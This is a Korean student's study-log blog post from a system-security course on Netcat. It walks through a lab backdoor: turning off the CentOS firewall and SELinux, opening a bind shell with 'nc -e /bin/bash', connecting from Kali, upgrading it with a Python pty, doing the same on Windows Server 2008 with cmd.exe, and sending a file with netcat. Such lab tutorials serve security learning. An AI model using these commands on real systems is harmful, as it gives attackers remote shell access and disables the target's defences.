2023. 12. 30. 17:28ㆍInformation Security 정보보안/System Security 시스템 보안
배울 내용:
TCP Bind
Netcat
넷켓
Netcat 파일전송
Netcat 해킹
Window 해킹방법
backdoor attack
백도어 공격
백도어 만드는법
DoS/DDoS
Window 해킹하기
제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.
틀린게 있으면 댓글로 써주시면 고치겠습니다.
지난시간에는 엄청많이 Snort를 배웠다
이번엔 BIND TCP는 서버 측에서 특정 포트를 열고, 클라이언트의 연결을 기다리는 방식으로 작동하는
BIND TCP 를 배울것이고 그중하나의
NetCat 을 배워볼것이다
먼저 netcat이 뭐냐고 물어보면
Netcat은 리눅스 및 다른 유닉스 계열 시스템에서 사용되는 강력한 네트워킹 유틸리티로
하나의 도구라고 보면된다.
이 도구는 네트워크 연결을 통해 데이터를 전송하고 받는 데 사용되며, TCP/IP 프로토콜을 기반이당
주로
네트워크 연결 생성 및 테스트 하거나 포트 스캐닝 , 파일전송 그리고 네트워크 관련작업을
자동화하는데 유용하게 쓰인다
그러나 그러한 이점이 있는 반면 다른방면에는 당연히
개발자가 원하지 않는 방향으로 쓰일때도 있다
크게 4가지를 보자면
백도어 생성
netcat을 사용해 백도어를 생성할수있다
데이터 탈취
netcat은 데이터를 전송, 수신함으로 이를 통해 데이터 탈취가 가능하다
포트 스캐닝과 서비스 감지
위에 봤던것처럼 포트 스캐닝을 해서 어떤 포트가 열려져있는지 확인할수있다
이를 통해 취약점을 찾을수 있다.
네트워크 트래픽 훼손
netcat을 사용해 트래픽을 가로채 변조하는것도 가능하다
이러한 사용법은 Netcat의 본래 목적과는 다르지만,
강력한 네트워크 도구의 특성 상 불가피하게 악용될 수 있는 부분이 있다..
자 그럼 어떻게 공격을 당하는지 알아야 방어를 하니 한번 알아볼까?
사실 이전 시간에 이미 비슷한 공격을 한번 했었다
한번더 공격하는 걸 어떻게 작동하는지
다시한번 보도록 하자 (백도어공격)
https://sarimus.tistory.com/28
System Security DAY_013 네트워크 기반 침입 탐지 시스템,NIDS,리눅스 탐지하는방법,스노트 탐지,Smurf A
배울 내용: 네트워크 기반 침입 탐지 시스템 NIDS 리눅스 탐지하는방법 스노트 탐지 Smurf Attack LAND Attack 디스크 자원고갈 공격 메모리 자원 고갈 공격 권한 획득공격 backdoor attack 백도어 공격 백도
sarimus.tistory.com
centos (공격 대상자)
# systemctl stop firewalld
# setenforce 0
# nc -e /bin/bash -l -p 4444
터미널 하나 더켜서
#netstat -tuna로 열려있는지확인
kali (공격자)
nmap 192.168.10.101 로 포트 열린거 확인후
nc 192.168.10.101 4444 로 연결
그러면
이렇게 침투가 가능하다 !
앞에 프롬프트 # 없는건
python -c 'import pty;pty.spawn("/bin/bash")'
이렇게 해서 만들수있다
그러나 이것도 엄연히 공격 대상자가 포트를 열고 들어오세요 로 문열어야지 된다
자그럼 이게 어떻게 됐는지 보자
<접속 대기>
#nc [옵션] ....
nc -e /bin/bash -l -p 4444
<프롬프트 가져오기>
python -c 'import pty;pty.spawn("/bin/bash")'
그리고 옵션은 여기에 있다
이번장부터 netcat 쓸때까지 잘알아두자
=========================
<옵션>
-l : 대기 모드
-p : 포트 지정
-e : 실행 프로그램 지정
-n : DNS 질의 하지 않음
-v : 접속 과정 상세 출력
-L : 세션을 지속적으로 유지
===========================
이번에는 리눅스 서버가 아닌
Window 서버(2008, 32bits 버전) 를 공격해보자 !
그전에 윈도우에서는 nc(netcat)를 깔아야한다
https://eternallybored.org/misc/netcat/
netcat 1.11 for Win32/Win64
eternallybored.org
위에걸 window2008 에서 nc 깔고 c에 넣고 cmd로 똑같이
nc 192.168.10.101 4444 하면 연결됨
(방화벽설정 해제필요)
<접속 요청>- kali
#nc [대상 IP 주소]
#nc 192.168.10.200 1234
<접속 대기> -windows
#nc [ [옵션] [설정값]....]
nc -L -e c:\windows\system32\cmd.exe -p 1234
이렇게 하면 될것이다
그러나 현재 window2008 64bits 이상인 버전은 자동으로 업데이트에
실시간 방화벽에 여러가지 강력한 보안프로그램 때문에 공격이 쉽지가 않다
그리고 2008도 방화벽을 취약하게 만들어야 공격이 가능하다
그럼 이번엔
[ NC로 파일전송 ] 해보자
<CentOS file.txt 으로전송 > --> kali(file.out 으로저장 )
이런 식으로 할거다
먼저 cent os 에서는 file.txt 에 넣고싶은 글넣고
kali 에서는 file.out 의 빈 파일만 만들어 놓은뒤
[Kali]
nc -l -p 1234 한뒤
[centos]
nc 192.168.10.100 1234 < file.txt
하면 file.txt (만들었던거 ) 전송됨
그러면 빈공간 이였던 file.out 이 file.txt 에 있던 걸로
채워 지게 된다
한번씩 해보도록 하자 !
많이 알면 알수록 좋다
Knowledge is power 이며
(지식은 힘이다 )
There is no end to learning 이다
(배움에는 끝이없다)
그러면 많이 알면 알수록
There is no end to growing my power 가 되겠지?
( 성장하는 나의힘은 끝이없다.)
오늘도 조금이나마 성장했길 바란다
DO NOT WASTE YOUR DAY!
그럼 20000!